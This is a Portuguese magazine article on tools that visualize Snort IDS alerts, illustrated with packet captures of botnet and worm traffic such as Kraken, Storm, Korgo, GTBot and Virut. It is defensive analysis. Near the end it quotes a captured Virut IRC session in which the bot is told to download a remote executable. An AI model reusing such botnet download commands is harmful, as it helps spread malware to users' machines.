Ferramentas para visualizar a saída do IDS

Tamanho: px
Começar a partir da página:

Download "Ferramentas para visualizar a saída do IDS"

Transcrição

1 Ferramentas para visualizar a saída do IDS A visão do IDS CAPA Encontre invasores com essas fáceis ferramentas de visualização. por Russ Mcree Marcel Hol A enchente de dados brutos gerados pelos sistemas de detecção de intrusão (IDS) costuma ser grande demais para especialistas em segurança, e os sinais claros de invasão acabam muitas vezes passando despercebidos em meio ao ruído. As ferramentas de visualização de segurança oferecem uma forma fácil e intuitiva para guiar o especialista pelos meandros de informação rumo aos padrões indicadores de intrusão. Certas ferramentas de análise e detecção usam a biblioteca Packet Capture (PCAP, como é mais conhecida) para capturar o tráfego. Vários aplicativos que a utilizam conseguem salvar num arquivo PCAP os dados coletados durante uma sessão de escuta, de forma a permitir sua leitura e análise com outras ferramentas. Os arquivos PCAP oferecem uma forma conveniente de preservar e recapitular dados de invasão. Este artigo utiliza a PCAP para explorar algumas ferramentas de visualização livres. Em cada cenário será mostrada a aparência do ataque segundo o sistema de detecção de intrusão Snort [1], e em seguida o visual do mesmo incidente num aplicativo de visualização de segurança. Este artigo também explora as ferramentas de visualização NetGrok, AfterGlow, Rumint, TNV e Ether Ape. A maioria delas está disponível no live CD DAVIX [2], um sistema baseado no Slax e pré-carregado com várias ferramentas livres de análise e visualização. A forma mais fácil de explorar as ferramentas deste artigo é baixar o DAVIX. Caso seja preferível instalar os aplicativos no seu próprio sistema, confira os sites dos projetos para mais informações de instalação. A discussão a seguir supõe que o leitor possua conhecimentos básicos de sistemas de detecção de intrusão em geral, além do Snort em particular. Se você não tiver experiência com o Snort, confira seu manual do usuário no website do projeto [3]. Também há excelentes tutoriais de Snort online e impressos. Para este artigo, foi utilizada uma grande variedade de malwares, e as capturas de pacotes foram realizadas durante os ataques. Além destas, também foi usada uma captura de pacotes do OpenPacket.org, uma ótima fonte de capturas, assim como do EvilFingers.com, outro bom repositório de PCAP. O wiki do NetworkMiner [4], uma ferramenta para Windows de análise de PCAPs, inclui uma excelente lista de sites de PCAPs. Os arquivos deste artigo foram lidos pelo venerável Snort 2.7 num sistema Ubuntu 9.04 com as regras emerging-all.rules do site EmergingThreats.net. Se você tiver vontade de experimentar o DAVIX, use-o no modo gráfico com KDE dentro de uma máquina virtual com pelo menos 1 GB de memória. Essa quantidade de memória fornecerá espaço suficiente para garantir um bom desempenho do Snort na linha de comando e para oferecer poder suficiente para as exigentes ferramentas de visualização. NetGrok O NetGrok [5] que é uma ferramenta de visualização em Java, é independente de sistema operacional que lê arquivos PCAP diretamente e é capaz de escutar numa interface de rede. Especificamente, o NetGrok se descreve como...uma excelente ferramenta de diagnóstico em tempo Linux Magazine #59 Outubro de

2 CAPA Visualização de IDS real, que permite a rápida compreensão do tráfego de rede e a detecção fácil de problemas. O NetGrok é o resultado de um esforço durante o curso Information Visualization de 2008 lecionado por Ben Schneiderman na Universidade de Maryland, EUA. A equipe anunciou recentemente que o NetGrok será incorporado ao live CD DAVIX. A ferramenta de visualização NetGrok possui duas dependências, ambas já contidas no arquivo baixado, embora cada uma necessite de mais etapas de instalação. O pacote inclui uma versão antiga da Libpcap, mas é possível atualizála com apt-get install libpcap0.8 em qualquer sistema Debian ou Ubuntu. O NetGrok também requer a Libjpcap. Depois de descompactar o Net- Grok, entre no diretório Netgrok/lib/ linux/. Copie os arquivos da Libjpcap (libjpcap.so e jpcap.jar) para os diretórios /usr/lib/jvm/java6openjdk/ jre/lib/i386/ e /usr/lib/jvm/java6openjdk/jre/lib/ext/, respectivamente, ou equivalentes na sua distribuição. Em seguida, talvez seja necessário ajustar o arquivo groups.ini disponível na raiz do NetGrok. Em particular, os testes deste artigo apagaram a menção a redes sem fio na referência a Private1. Para testar o NetGrok, foi usado o PCAP Kraken.pcap, disponível no OpenPacket.org e listado na categoria Malicious (maliciosos) [6]. O arquivo tinha originalmente o nome 12b0c78f05f33fe25e08addc60bd9b7c.pcap devido ao hash MD5 do binário que gerou o tráfego, mas foi simplificado aqui para ficar de acordo com o nome malware. O Kraken é um spam bot; esta variante utiliza a porta TCP/UDP 447 para comando e controle. Após copiar o arquivo emergingall.rules do EmergingThreats.net para o diretório de regras do Snort e ativá-lo no arquivo snort.conf, foi executado o arquivo kraken.pcap por meio do Snort: sudo snort -c /etc/snort/snort. conf -r kraken.pcap -l output /kraken A listagem 1 mostra os alertas resultantes desse comando. Os alertas indicam claramente uma conversa entre a vítima, , e o servidor de comando e controle, Com essas informações, como o NetGrok encontra algo? Inicie o NetGrok com o comando java -jar netgrok jar. Será mostrada uma interface simples e elegante; em seguida, clique em File e Open PCAP File e selecio- Listagem 1: Arquivo kraken.pcap no Snort 01 [**] [1: :3] ET TROJAN Bobax/Kraken/Oderoor UDP 447 CnC Channel Initial Packet Inbound [**] 03 02/22 04:20: :447 > : UDP TTL:48 TOS:0x0 ID:0 IpLen:20 DgmLen:52 DF 05 Len: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 07 [Xref => [**] [1: :3] ET TROJAN Possible Bobax/Kraken/Oderoor TCP 447 CnC Channel Inbound [**] 10 [Classification: A Network Trojan was detected] [Priority: 1] 11 02/22 04:20: :447 > : TCP TTL:48 TOS:0x0 ID:23263 IpLen:20 DgmLen:1500 DF 13 ***A**** Seq: 0xC Ack: 0x1D12B7D Win: 0x16D0 TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 15 [Xref => [**] [1: :3] ET TROJAN Possible Bobax/Kraken/Oderoor TCP 447 CnC Channel Outbound [**] 18 [Classification: A Network Trojan was detected] [Priority: 1] 19 02/22 04:20: :1054 > : TCP TTL:128 TOS:0x0 ID:459 IpLen:20 DgmLen:40 DF 21 ***A**** Seq: 0x1D12B7D Ack: 0xC6815DCD Win: 0x4470 TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 23 [Xref => [**] [1: :3] ET TROJAN Bobax/Kraken/Oderoor TCP 447 CnC Channel Initial Packet Outbound [**] 26 [Classification: A Network Trojan was detected] [Priority: 1] 27 02/22 04:20: :1055 > : TCP TTL:128 TOS:0x0 ID:475 IpLen:20 DgmLen:64 DF 29 ***AP*** Seq: 0x95E9CBD1 Ack: 0xC63DF5FA Win: 0x4470 TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_bobax] 31 [Xref =>

3 Visualização de IDS CAPA Figura 1 Arquivo kraken.pcap na visão de grafos do NetGrok. ne kraken.pcap. Serão mostradas representações visuais de acordo com os dados gerados pelo Snort (figura 1). Os nós em vermelho são aqueles que usam a maior parte da banda, enquanto que os verdes usam a menor parte e os transparentes marcam máquinas que não utilizam banda alguma. As máquinas dentro da região tracejada são locais, ao passo que todas as demais encontram-se fora da rede local. Listagem 2: Arquivo ecard.pcap no Snort Para aproximar um nó, dê um duplo clique nele; ao passar sobre o nó, serão exibidos detalhes sob demanda na interface do NetGrok. No caso dos nós vermelhos, o mouse revelará seu endereço IP como Ao passar sobre o nó marrom (o que utiliza a segunda maior quantidade de banda), será exibido o IP Estes resultados estão perfeitamente de acordo com a saída do Snort. É possível ver a vítima conversando com 01 [**] [1: :4] ET TROJAN Storm Worm Encrypted Variant 1 Traffic (1) [**] 03 05/03 15:07: :22149 > : UDP TTL:116 TOS:0x0 ID:28417 IpLen:20 DgmLen:53 05 Len: [Xref => bin/cvsweb.cgi/sigs /VIRUS/TROJAN_Storm] 07 [Xref => o servidor de comando e controle O NetGrok também permite exibir visões de TreeMap [7]. Essa visão é ideal para grandes arquivos PCAP sem oclusão. Este artigo utilizou o PCAP ecard.pcap, uma captura obtida ao analisar o malware Storm. Este malware conversa incessantemente com seus pares por meio de UDP criptografado e gera muito ruído nos logs. O alerta do Snort é exibido na listagem 2. A visualização em TreeMap no Net- Grok define dois fatos claros. O maior falante é claramente ( bytes marcados como o grande cubo vermelho), que se encontra na rede local, indicada pela linha preta mais grossa que o separa das máquinas externas. A outra descoberta óbvia é a imensidão de pares com os quais a máquina local conversou em trechos de 106 a 212 bytes. O NetGrok também inclui úteis mecanismos de filtragem para permitir o isolamento de máquinas por IP, banda e grau (recebidos versus enviados). AfterGlow O AfterGlow [8], fruto de Raffael Marty, autor de Applied Security Visualization, é uma das muitas ferramentas de virtualização incluídas na distribuição DAVIX, facilmente acessível pelo menu Visualize. Como o AfterGlow usa dados no estilo CSV como entrada, foi usado o script tcpdump2csv.pl disponível em /usr/local/bin/ no DAVIX. O script Listagem 3: Arquivo camda.pcap no Snort 01 [**] [1: :7] ET ATTACK RESPONSE IRC Private message on non std port [**] 03 05/03 14:52: :1156 > : TCP TTL:128 TOS:0x0 ID:24739 IpLen:20 DgmLen:122 DF 05 ***AP*** Seq: 0xDE571EA6 Ack: 0xA4EB6BC Win: 0xFD92 TcpLen: [Xref => bin/cvsweb.cgi/sigs/attack_response/attack_response_ Non Standard_IRC] 07 [Xref => Linux Magazine #59 Outubro de

4 CAPA Visualização de IDS recebe a saída do tcpdump e grava um arquivo CSV. O uso recomendado do After- Glow normalmente inclui enviar (por pipes) todas as etapas para um único comando, mas a conversão de tcpdump para CSV é mais útil para propósitos de ilustração. Foi usado o camda.pcap, uma captura obtida durante a análise de uma amostra de Flood IRC. Os resultados de alertas do Snort do camda.pcap são mostrados na listagem 3. Para converter esse arquivo PCAP para CSV, foi executado o seguinte comando: tcpdump -vttttnnelr camda.pcap /usr/local/bin/tcpdump2csv.pl sip dip dport > camda.csv O tcpdump2csv.pl permite selecionar vários campos possíveis para gravar na saída CSV, incluindo marcas de hora, destino e origem IP, MAC e porta, assim como time-to-live (TTL) e outros parâmetros. Confira o conteúdo do script para mais detalhes. Para enviar o arquivo camda.csv resultante para o AfterGlow, foi usado: cat camda.csv afterglow.pl -c /usr/local/share/afterglow /color.properties -v dot -Tgif -o camda.gif A figura 2 inclui o tráfego local já esperado, mas também acentua as descobertas do Snort relativas ao tráfego IRC. Note que o IP de origem está conversando com o IP por meio da porta 5553 (uma porta não padrão do IRC). O AfterGlow gera saída em DOT para o GraphViz, portanto requer as ferramentas do GraphViz para gerar a imagem e o mapa da imagem. O GraphViz inclui o comando dot, que gera desenhos hierárquicos ou em camadas, enquanto o neato e o fdp geram modelos de mola, o twopi desenha diagramas radiais e o circo cria esquemas circulares. Um ótimo exemplo de imagem de modelo de mola se encontra no secviz.org [9]. Rumint O rumint de Greg Conti [10] é uma útil ferramenta de visualização que recebe arquivos PCAP sem manipulação ou conversão. Este artigo usou um dos arquivos PCAP anônimos do EvilFingers (anon_sid_ _ _5219_ pcap) para mostrar os poderes do rumint. Este exercício específico se mostrou útil em duas ocasiões. Como não há como ter certeza de que a análise do malware tenha sido feita por alguém competente afinal, os arquivos do EvilFingers são anônimos, este exercício oferece a oportunidade de demonstrar o valor da saída do Snort (particularmente Figura 2 Arquivo camda.pcap no AfterGlow. Listagem 4: Arquivo korgo.pcap no Snort ao executar as regras de Emerging Threats), assim como a visualização correspondente. Um dos alertas do Snort gerados por esse PCAP imediatamente identifica uma variante do Korgo.P como culpado. O Korgo, assim como o Padobot, é um antigo worm que explorava uma vulnerabilidade do LSASS do Microsof Windows em Segundo a F-Secure, como mostra o alerta abaixo, o worm contacta computadores remotos na porta TCP 445, explora a vulnerabilidade do LSASS e copia 01 [**] [1: :7] ET WORM Korgo.P offering executable [**] 03 06/27 19:47: :2710 > : TCP TTL:128 TOS:0x0 ID:49809 IpLen:20 DgmLen:1500 DF 05 ***A**** Seq: 0xDBBC709A Ack: 0xB6E50743 Win: 0xFDBF TcpLen: [Xref => bin/cvsweb.cgi/sigs /VIRUS/WORM_KORGO] 07 [Xref => => secure.com/v descs/korgo_p.shtml] Figura 3 Arquivo korgo.pcap na plotagem paralela de coordenadas. 44

5 Visualização de IDS CAPA Listagem 5: Arquivo gtbot.pcap no Snort 01 [**] [1: :3] COMMUNITY BOT GTBot ver command [**] 03 10/04 18:25: :5050 > : TCP TTL:64 TOS:0x0 ID:53296 IpLen:20 DgmLen:348 DF 05 ***AP*** Seq: 0xCA5E0BB6 Ack: 0xB97E3616 Win: 0x16D0 TcpLen: 20 Figura 4 Arquivo gtbot.cap no TNV. seu arquivo para o sistema remoto. O alerta do Snort que marcou essa descrição é mostrado na listagem 4. O arquivo PCAP anon_sid foi renomeado para korgo.pcap, que em seguida foi usado para executar o rumint. Para isso, bastou o rumint a partir do menu do DAVIX, clicar em File e depois em Load PCAP Dataset. Após o PCAP ser carregado no buffer, deve-se clicar em View e escolher algumas das sete opções. Recomenda-se a visualização Parallel Coordinate Plot com seis eixos. Para este PCAP, configuramos os eixos da seguinte forma: IP de origem, IP de destino, porta TCP de origem, porta TCP de destino, ID IP e TTL. O Rumint oferece várias outras opções para a visualização com eixos; basta selecionar pelo tipo de tráfego. A figura 3 imediatamente esclarece o alerta do Snort. Note como cada detalhe indicado no alerta do Snort fica imediatamente evidente no Parallel Coordinate Plot do rumint enquanto ele lê o quadro 22 do PCAP. O IP de origem se conecta ao IP de destino a partir da porta 2710 com destino à porta 445 (comum para malwares que exploram RPCs Microsoft). O alerta do Snort também exibe o ID IP e um TTL de 128, ambos claramente indicados no quinto e sexto eixos do rumint. TNV O TNV (Time-base Network Visualizer) [11] é escrito em Java e independente de plataforma, também pode usar como entrada saídas criadas para a Libpcap, ou realizar ele próprio a captura a partir de uma interface de sistema. John Goodall, do vizsec.org, criou o TNV como parte de seu trabalho de graduação. É possível usar o TNV diretamente a partir do menu Visualize do DA- VIX. Note que máquinas remotas na região esquerda da interface e a matriz de máquinas locais à direita podem ser reordenadas. Utilizamos uma velha variante do GTBot para gerar o arquivo gtbot.pcap (figura 4). A listagem 5 mostra um dos alertas do Snort gerados a partir do arquivo gtbot.pcap. O TNV é lento para carregar arquivos PCAP maiores, então é preciso ter paciência. Dito isso, provavelmente todos acharão os resultados muito úteis. O alerta do Snort apontou para o IP e a porta de origem 5050 conectando-se a na porta Essas descobertas são suportadas em todas as três visões do TNV, incluindo o tráfego específico de recebimento por portas (no painel à direita) e conectandose a (no painel primário exemplificado pela linha mais grossa de conexão e uma caixa popout), e os detalhes na visão de todos os pacotes. Para encontrar más intenções em arquivos PCAP menores, o TNV costuma oferecer gratificação instantânea. Não se esqueça de declarar uma faixa doméstica de endereços de rede que inclua o espaço primário de IPs usado no arquivo PCAP analisado. Listagem 6: Arquivo virut.pcap no Snort 01 [**] [1: :3] ET TROJAN W32.Virut.A joining an IRC Channel [**] 03 05/30 23:12: :1048 > : TCP TTL:128 TOS:0x0 ID:3686 IpLen:20 DgmLen:67 DF 05 ***AP*** Seq: 0x9A24EA7C Ack: 0x55A62BF6 Win: 0xFFFF TcpLen: [Xref => bin/cvsweb.cgi/sigs/virus/trojan_virut] 07 [Xref => => Linux Magazine #59 Outubro de

6 CAPA Visualização de IDS EtherApe O EtherApe [12] é mais uma das ofertas do DAVIX, encontrado no menu Visualize. Ele também carrega arquivos PCAP diretamente e, assim como seu compatriota rumint, reprisa o PCAP em tempo real enquanto exibe os resultados. Usando novamente um exemplo de PCAP baixado do EvilFingers. com, recebemos do Snort o alerta da listagem 6 após ele ler o arquivo anon_sid_ _ pcap. O arquivo PCAP foi renomeado para virut.pcap porque o W32.Virut.A foi o responsável por essa saída. O W32.Virut.A injeta seu código em todos os processos em andamento, abre uma backdoor na porta na máquina comprometida e em seguida tenta conectar-se a servidores IRC. O arquivo virut.pcap foi lido pelo EtherApe e os resultados são mostrados na figura 5. A máquina está comprometida e mostra claramente a backdoor aberta na porta TCP Os dados crus da sessão desse PCAP conforme disponíveis no EvilFingers também confirmam o alerta do Snort em conjunto com a visualização: NICK vouswcmm USER v :-Service Pack 2 JOIN &virtu :* PRIVMSG vouswcmm :!get ygyyqtqeyp.hj/dl/loadadv735.exe PING :i PONG :i JOIN &virtu Conclusão Uma visão aprimorada de ameaças de segurança leva a uma resposta mais capaz. Nesta altura, o leitor já deve ter entendido e concordado que a visualização de dados de segurança é uma verdadeira parceira do Snort. Quem se interessar pela visualização de dados de segurança pode começar a contribuir com o projeto Figura 5 Arquivo virut.pcap no EtherApe entrando num canal IRC. DAVIX. Especificamente seu líder Jan Monsch indicou que seria um grande trabalho para a comunidade alguém fazer a integração da ferramenta AfterGlow com o DAVIX. Um trabalho desse poderia permitir a conversão de formatos de dados entre diferentes ferramentas, além Mais informações [1] Snort: [2] DAVIX: [3] Manual de uso do Snort: de tornar o DAVIX mais acessível para muitas pessoas. A maioria das ferramentas disponíveis na distribuição DAVIX requer entradas variadas, às vezes em formatos proprietários. A entrada baseada em CSV para todas as ferramentas seria ótima para expandir o público do DAVIX. n [4] Network Miner: Publicly+available+PCAP+files [5] NetGrok: [6] Repositórios de capturas do OpenPacket.org: [7] TreeMap: [8] AfterGlow: [9] Fogos de artifício: visualized-storm-fireworks-your-4th-july [10] Rumint: [11] TNV: [12] EtherApe: Gostou do artigo? Queremos ouvir sua opinião. Fale conosco em cartas@linuxmagazine.com.br Este artigo no nosso site:

MINISTÉRIO DA EDUCAÇÃO

MINISTÉRIO DA EDUCAÇÃO MINISTÉRIO DA EDUCAÇÃO SECRETARIA DE EDUCAÇÃO PROFISSIONAL E TECNOLÓGICA INSTITUTO FEDERAL DE EDUCAÇÃO, CIÊNCIA E TECNOLOGIA DE SANTA CATARINA CAMPUS SÃO JOSÉ REDES DE COMPUTADORES Laboratório 2 Wireshark

Leia mais

Manual do Desktop Sharing. Brad Hards Tradução: Marcus Gama

Manual do Desktop Sharing. Brad Hards Tradução: Marcus Gama Brad Hards Tradução: Marcus Gama 2 Conteúdo 1 Introdução 5 2 O protocolo do Buffer de Quadro Remoto (Buffer de Quadro Remoto) 6 3 Usando o Desktop Sharing 7 3.1 Gerenciando convites do Desktop Sharing........................

Leia mais

Sistema topograph 98. Tutorial Módulo Fundiário

Sistema topograph 98. Tutorial Módulo Fundiário Sistema topograph 98 Tutorial Módulo Fundiário Preparando o desenho para o Módulo Fundiário _ 1. Na área de trabalho do Windows, procure o ícone do topograph e dê um duplo clique sobre ele para carregar

Leia mais

Visualizador de Documentos Fiscais Eletrônicos FAQ (Perguntas frequentes)

Visualizador de Documentos Fiscais Eletrônicos FAQ (Perguntas frequentes) Visualizador de Documentos Fiscais Eletrônicos FAQ (Perguntas frequentes) 1. Quais são os requisitos de software para executar o Visualizador em meu computador? Para executar o Visualizador é necessário

Leia mais

Sistemas Operacionais. Curso Técnico Integrado Profa: Michelle Nery

Sistemas Operacionais. Curso Técnico Integrado Profa: Michelle Nery Sistemas Operacionais Curso Técnico Integrado Profa: Michelle Nery Conteúdo Programático CONTAS DE E GRUPOS DE O Microsoft Management Console - MMC Permissões de Segurança de um Console Contas de Usuários

Leia mais

DarkStat para BrazilFW

DarkStat para BrazilFW DarkStat para BrazilFW ÍNDICE Índice Página 1 O que é o DarkStat Página 2 DarkStat e a inicialização do sistema Página 2 DarkStat e a finalização do sistema Página 2 Tela Principal do DarkStat Página 3

Leia mais

Superintendência Regional de Ensino de Ubá - MG Núcleo de Tecnologia Educacional NTE/Ubá. LibreOffice Impress Editor de Apresentação

Superintendência Regional de Ensino de Ubá - MG Núcleo de Tecnologia Educacional NTE/Ubá. LibreOffice Impress Editor de Apresentação Superintendência Regional de Ensino de Ubá - MG Núcleo de Tecnologia Educacional NTE/Ubá LibreOffice Impress Editor de Apresentação Iniciando o Impress no Linux Educacional 4 1. Clique no botão 'LE' no

Leia mais

Boletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema

Boletim Eletrônico de Recolhimento Manual do Sistema. Boletim Eletrônico de Recolhimento. Manual do Sistema Boletim Eletrônico de Recolhimento Manual do Sistema Versão 1.2 Junho / 2013 Sumário 1. Introdução... - 3-2. O Sistema BOLETIM ELETRÔNICO DE RECOLHIMENTO... - 3-3. Pré-requisitos... - 3-4. Primeiro Acesso...

Leia mais

PowerPoint 2010 para o Office 365 para empresas

PowerPoint 2010 para o Office 365 para empresas PowerPoint 2010 para o Office 365 para empresas Faça a migração O Microsoft PowerPoint 2013 tem uma aparência diferente das versões anteriores. Assim, veja a seguir uma visão geral dos novos recursos e

Leia mais

Notas de versão do cliente Fiery Network Controller para Xerox WorkCentre 7800 Series, versão 1.0

Notas de versão do cliente Fiery Network Controller para Xerox WorkCentre 7800 Series, versão 1.0 Notas de versão do cliente Fiery Network Controller para Xerox WorkCentre 7800 Series, versão 1.0 Este documento contém informações importantes sobre esta versão. Não se esqueça de fornecer essas informações

Leia mais

Tutorial de uso do Subversion com RapidSVN

Tutorial de uso do Subversion com RapidSVN Universidade Federal de São Carlos Departamento de Computação Tutorial de uso do Subversion com RapidSVN João Celso Santos de Oliveira Orientação: Prof.ª Dra. Marilde T. P. Santos - São Carlos - Agosto

Leia mais

O QUE É A CENTRAL DE JOGOS?

O QUE É A CENTRAL DE JOGOS? O QUE É A CENTRAL? A Central de Jogos consiste de duas partes: Um site na Internet e um programa de computador (Central) que deve ser instalado em sua máquina. No site www.centraldejogos.com.br, você pode

Leia mais

1. Capturando pacotes a partir da execução do traceroute

1. Capturando pacotes a partir da execução do traceroute Neste laboratório, iremos investigar o protocolo IP, focando o datagrama IP. Vamos fazê-lo através da analise de um trace de datagramas IP enviados e recebidos por uma execução do programa traceroute (o

Leia mais

TRBOnet MDC Console. Manual de Operação

TRBOnet MDC Console. Manual de Operação TRBOnet MDC Console Manual de Operação Versão 1.8 ÍNDICE NEOCOM Ltd 1. VISÃO GERAL DA CONSOLE...3 2. TELA DE RÁDIO...4 2.1 COMANDOS AVANÇADOS...5 2.2 BARRA DE FERRAMENTAS...5 3. TELA DE LOCALIZAÇÃO GPS...6

Leia mais

O EDITOR DE APRESENTAÇÕES POWER POINT

O EDITOR DE APRESENTAÇÕES POWER POINT O EDITOR DE APRESENTAÇÕES POWER POINT O Power Point é um poderoso editor de apresentações muito utilizado quando for preciso fazer a exibição de trabalhos, projetos, aulas e afins em slides coloridos e

Leia mais

Procedimentos para Configuração de Redirecionamento de Portas

Procedimentos para Configuração de Redirecionamento de Portas Procedimentos para Configuração de Redirecionamento de Portas A opção avançada de Port Forwarding permite que você defina uma única porta pública ou Range de portas em seu roteador para redirecionar a

Leia mais

Portaria Express 2.0

Portaria Express 2.0 Portaria Express 2.0 A portaria do seu condomínio mais segura e eficiente. Com a preocupação cada vez mais necessária de segurança nos condomínio e empresas, investe-se muito em segurança. Câmeras, cercas,

Leia mais

Sistemas Operacionais. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com

Sistemas Operacionais. Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Sistemas Operacionais Prof. André Y. Kusumoto andrekusumoto.unip@gmail.com Estruturas de Sistemas Operacionais Um sistema operacional fornece o ambiente no qual os programas são executados. Internamente,

Leia mais

Como criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo.

Como criar um blog. Será aberta uma janela onde você deverá especificar o título do blog, o endereço do blog, e o modelo. Como criar um blog Criando o blog Vá em www.blogger.com. Entre com sua conta google (a mesma que você usa para acessar o gmail). Escolha um perfil. Na página seguinte, clique no botão novo blog. Será aberta

Leia mais

CADASTRO DE OBRAS E PROJETOS DE ENGENHARIA

CADASTRO DE OBRAS E PROJETOS DE ENGENHARIA CADASTRO DE OBRAS E PROJETOS DE ENGENHARIA SET 2014 2 INTRODUÇÃO Este manual objetiva orientar os servidores no processo do cadastro de projetos no Sistema Channel para viabilizar o acompanhamento físico-financeiro

Leia mais

Notas de versão do cliente Fiery Color Profiler Suite, versão 4.5.1

Notas de versão do cliente Fiery Color Profiler Suite, versão 4.5.1 Notas de versão do cliente Fiery Color Profiler Suite, versão 4.5.1 Este documento contém informações importantes sobre esta versão. Lembre-se de fornecer essas informações a todos os usuários antes de

Leia mais

Tutorial ConvertXtoDVD 3

Tutorial ConvertXtoDVD 3 Tutorial ConvertXtoDVD 3 Índice: Adicionando seus arquivos de vídeo Adicionando um ou mais vídeos Página 2 Qualidade da conversão Página 3 Personalizando o menu Página 4 Escolhendo um template para o menu

Leia mais

Usando o Conference Manager do Microsoft Outlook

Usando o Conference Manager do Microsoft Outlook Usando o Conference Manager do Microsoft Outlook Maio de 2012 Conteúdo Capítulo 1: Usando o Conference Manager do Microsoft Outlook... 5 Introdução ao Conference Manager do Microsoft Outlook... 5 Instalando

Leia mais

Primeiros passos das Planilhas de Obra v2.6

Primeiros passos das Planilhas de Obra v2.6 Primeiros passos das Planilhas de Obra v2.6 Instalação, configuração e primeiros passos para uso das planilhas de obra Elaborado pela Equipe Planilhas de Obra.com Conteúdo 1. Preparar inicialização das

Leia mais

Prof. Marcos Monteiro. http://www.marcosmonteiro.com.br contato@marcosmonteiro.com.br

Prof. Marcos Monteiro. http://www.marcosmonteiro.com.br contato@marcosmonteiro.com.br Prof. Marcos Monteiro http://www.marcosmonteiro.com.br contato@marcosmonteiro.com.br https://www.snort.org Pra Instalar: Pacotes necessários para a instalação do Snort: libpcap libpcre tcpdump openssl

Leia mais

... MANUAL DO MODERADOR SERVIÇOS DE WEB

... MANUAL DO MODERADOR SERVIÇOS DE WEB ... MANUAL DO MODERADOR SERVIÇOS DE WEB ÍNDICE 1. IMPLEMENTAÇÃO 4 1.1 PAINEL DE CONTROLE 4 1.2 SENHA 4 1.3 INSTALAÇÃO 4 1.3.1 INSTALAÇÃO PARA MODERADOR 4 1.3.2 INSTALAÇÃO PARA PARTICIPANTES 8 1.3.2.1 PELO

Leia mais

MANUAL DA SECRETARIA

MANUAL DA SECRETARIA MANUAL DA SECRETARIA Conteúdo Tela de acesso... 2 Liberação de acesso ao sistema... 3 Funcionários... 3 Secretaria... 5 Tutores... 7 Autores... 8 Configuração dos cursos da Instituição de Ensino... 9 Novo

Leia mais

Manual do usuário. Viewer

Manual do usuário. Viewer Manual do usuário Viewer Outubro / 2010 Manual do Heron Viewer Índice Heron Viewer... 2 Instalação... 2 Configuração... 5 Configurando o servidor (Computador que acompanha o aparelho Heron)... 5 Configurando

Leia mais

1. Explicando Roteamento um exemplo prático. Através da análise de uns exemplos simples será possível compreender como o roteamento funciona.

1. Explicando Roteamento um exemplo prático. Através da análise de uns exemplos simples será possível compreender como o roteamento funciona. Aula 14 Redes de Computadores 24/10/07 Universidade do Contestado UnC/Mafra Sistemas de Informação Prof. Carlos Guerber ROTEAMENTO EM UMA REDE DE COMPUTADORES A máscara de sub-rede é utilizada para determinar

Leia mais

Guia: como instalar o Ubuntu Linux

Guia: como instalar o Ubuntu Linux Guia: como instalar o Ubuntu Linux Você cansou do Windows e quer se aventurar a usar alguma distribuição Linux, mas não sabe por onde começar? Montamos um passo a passo com todas as etapas necessárias

Leia mais

Do Word 2007 para o Office 365 para empresas

Do Word 2007 para o Office 365 para empresas Do Word 2007 para o Office 365 para empresas Faça a migração O Microsoft Word 2013 para área de trabalho está diferente das versões anteriores. Assim, veja a seguir uma visão geral dos novos recursos e

Leia mais

Objetivo: descrever como abrir uma solicitação de suporte técnico através da internet.

Objetivo: descrever como abrir uma solicitação de suporte técnico através da internet. Suporte Técnico Hotline Como abrir uma solicitação Denilson Pegaia Objetivo: descrever como abrir uma solicitação de suporte técnico através da internet. Aviso: Este documento apresenta dicas e exemplos

Leia mais

Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM

Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM Instruções de Instalação do IBM SPSS Modeler (Licença de Usuário Autorizado) IBM Índice Instruções de Instalação....... 1 Requisitos do sistema........... 1 Código de autorização.......... 1 Instalando...............

Leia mais

Simulado Informática Concurso Correios - IDEAL INFO

Simulado Informática Concurso Correios - IDEAL INFO Simulado Informática Concurso Correios - IDEAL INFO Esta prova de informática é composta por 20 (vinte) questões de múltipla escolha seguindo o molde adotado pela UnB/CESPE. O tempo para a realização deste

Leia mais

TOP SAÚDE SEPACO AUTOGESTÃO

TOP SAÚDE SEPACO AUTOGESTÃO TOP SAÚDE SEPACO AUTOGESTÃO Dezembro / 2014 Sumário 1. Apresentação e acesso ao sistema...3 2. Tela inicial do sistema...5 3. Autorização de Procedimento Via Prestador...6 3.1. Impressão Guia TISS...6

Leia mais

Exemplo: Na figura 1, abaixo, temos: Clique aqui para continuar, que é a primeira atividade que você precisa realizar para iniciar seus estudos.

Exemplo: Na figura 1, abaixo, temos: Clique aqui para continuar, que é a primeira atividade que você precisa realizar para iniciar seus estudos. Visão Geral VISÃO GERAL Esse material abordará o acesso ao AVA (Ambiente Virtual de Aprendizagem) da Proativa do Pará, com intenção de ilustrar os aspectos na visão do Aprendiz. Essa abordagem dedica-se

Leia mais

TUTORIAL PARA PREPARAÇÃO E IMPORTAÇÃO DE DADOS PARA. Os dados de suas coletas devem ser organizados em uma planilha eletrônica, de modo

TUTORIAL PARA PREPARAÇÃO E IMPORTAÇÃO DE DADOS PARA. Os dados de suas coletas devem ser organizados em uma planilha eletrônica, de modo TUTORIAL PARA PREPARAÇÃO E IMPORTAÇÃO DE DADOS PARA ESTIMATIVAS DE RIQUEZA DE ESPÉCIES Softwares utilizados: Excel, EstimateS e Statistica. Preparação dos dados Os dados de suas coletas devem ser organizados

Leia mais

Lab 4 Análise de Pacotes utilizando o TCPDUMP

Lab 4 Análise de Pacotes utilizando o TCPDUMP Objetivo: Lab 4 Análise de Pacotes utilizando o TCPDUMP i) Utilizar aplicativo de análise de pacotes TCPDUMP. TCPDUMP: O tcpdump é um programa cuja utilidade principal é visualizar e analisar o tráfego

Leia mais

Manual do Usuário. Protocolo

Manual do Usuário. Protocolo Manual do Usuário Protocolo Índice de capítulos Parte I - Processos............................... 01 1 - Buscar................................ 01 2 - Listar................................ 02 3 - Abertura..............................

Leia mais

Manual de instalação, configuração e utilização do Assinador Betha

